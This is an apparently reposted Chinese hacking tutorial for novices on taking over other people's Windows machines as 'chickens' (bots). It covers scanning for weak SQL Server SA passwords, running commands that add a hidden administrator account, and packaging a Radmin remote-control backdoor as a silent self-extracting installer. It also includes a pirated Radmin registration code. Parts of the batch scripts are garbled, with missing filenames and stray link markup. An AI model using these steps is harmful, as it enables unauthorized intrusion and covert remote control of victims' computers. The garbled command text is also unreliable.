新手抓鸡方法大全

2024年6月3日发(作者：)

新手抓鸡方法大全

2009-09-09 01:02

抓鸡很多人都会，但不一定全会，今天，我对所有方法做总结，也会介绍！

首先是端口抓鸡，一般比较常用！有3389、1433、445、139、135等

3389端口抓鸡

工具:WINNTAutoAttack自动攻击器（扫漏洞）；SQLTOOLS（SA空口令连接器）；

RAMDIN影子3.0中文版（远程控制程序）（RADMIN注册码:

08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA

6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23）；

（隐藏3389服务及不让管理发现自己程序）；（小

榕的擦PP程序）；（开3389端口服务的）；（使用被禁止的

Guest帐户要用到的）；（远程桌面连接程序）。

一.扫到SA弱口令(自动攻击器)

二.用SQLTOOLS连上去建一个用户

net start telnet

开telnet服务

net user mint mint /add

添加用户mint密码为

mint net localgroup administrators mint /add

将帐号mint升级为管理员

三.上传后门程序(RADMIN服务端自解压程序)

制作过程:

1、到Radmin安装目录下找到、 和r_；

2、在本地设置服务端（一定要生成）；

设置密码-->>设置连接端口(默认4489)-->>生成

3、导出注册表HKEY_LOCAL_MACHINESYSTEMRadmin的键值为；

4、编写一个批处理，并命名为；

@echo offnet stop r_server

5、写第二个批处理，,内容为：

@echo [url=mailto:off@]off@[/url] /

uninstall /silence@ /install /

silence@regedit /s @echo

[url=mailto:off@]off@[/url] /uninstall /

[url=mailto:silence@]silence@[/url] /install

/silence@regedit /

s @net start r_server@del

@del @del @del

6、将 (r_改名)

压缩成压缩包；

7、将制作成自解压文件；

选择的自释放模块-->>高级自释放选项

-->>常规

释放路径:%systemroot%system32

安装程序:释放后运行: 释放前运行

-->>摸式

缄默模式:全部隐藏 覆盖方式:覆盖所有文件

-->>确定-->>确定

生成完成。

四.用RADMIN客服端连接

上传文件到c:WINNT(XP是windows):

(如果是在XP下，这个要把里面的WINNT改为Windows)